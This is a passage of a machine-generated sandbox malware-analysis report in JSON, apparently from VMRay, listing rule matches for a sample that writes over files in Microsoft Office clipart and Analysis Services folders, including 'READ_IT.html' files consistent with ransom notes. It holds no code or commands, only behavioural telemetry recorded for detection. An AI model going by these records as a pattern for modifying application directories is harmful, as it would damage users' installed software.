"technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01740_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01740_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44346", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01740_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01742_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01742_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44353", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01742_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01743_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01743_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44360", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01743_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01744_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01744_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44367", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01744_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01745_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01745_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44374", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01745_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01746_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01746_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44381", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01746_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01747_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01747_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44388", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01747_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01748_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01748_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44395", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01748_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01749_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01749_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44402", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01749_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01750_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01750_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44409", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01750_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01751_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01751_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44416", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01751_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01770_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01770_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44423", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01770_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01838_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01838_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44430", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01838_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01839_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01839_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44437", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01839_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01840_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01840_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44444", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01840_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01842_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01842_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44451", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01842_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB01843_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01843_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44458", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb01843_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WB02229_.GIF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wb02229_.gif", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44465", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wb02229_.gif\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL1.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl1.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44472", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl1.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WHIRL2.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl2.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44479", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\whirl2.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING1.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing1.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44486", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wing1.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WING2.WMF", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wing2.wmf", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44493", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wing2.wmf\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\WNTER_01.MID", "hashes": [], "norm_filename": "c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44500", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft office\\clipart\\pub60cor\\wnter_01.mid\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msmdsrv.rll", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44511", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msmdsrv.rll\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44597", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Resources\\1033\\msolui100.rll", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44600", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\resources\\1033\\msolui100.rll\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as80.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44607", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as80.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\READ_IT.html", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\read_it.html", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44615", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\read_it.html\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\as90.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44618", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\as90.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\Informix.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44627", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\informix.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\msjet.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44636", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\msjet.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql2000.xsl", "hashes": [], "norm_filename": "c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl", "operations": [ "write" ], "type": "file_artifact", "version": 1 } ], "ips": [], "mutexes": [], "registry": [], "type": "artifacts", "urls": [], "version": 1 }, "category": "_file_system", "category_desc": "File System", "operation": "_modify_application_dir", "operation_desc": "Modify application directory", "ref_gfncalls": [ { "ref_id": "gfn_44645", "ref_source": "glog", "ref_type": "gfncall", "type": "reference", "version": 1 } ], "rule_score": 5, "rule_type": "built_in", "rule_version": 1, "technique": "vmray_modify_application_dir_by_file", "technique_desc": "Modify \"c:\\program files\\microsoft analysis services\\as oledb\\10\\cartridges\\sql2000.xsl\".", "technique_path": "built_in._file_system._modify_application_dir.vmray_modify_application_dir_by_file", "type": "vti_rule_match", "version": 1 }, { "artifacts": { "files": [ { "filename": "C:\\Program Files\\Microsoft Analysis Services\\AS OLEDB\\10\\Cartridges\\sql70.xsl", 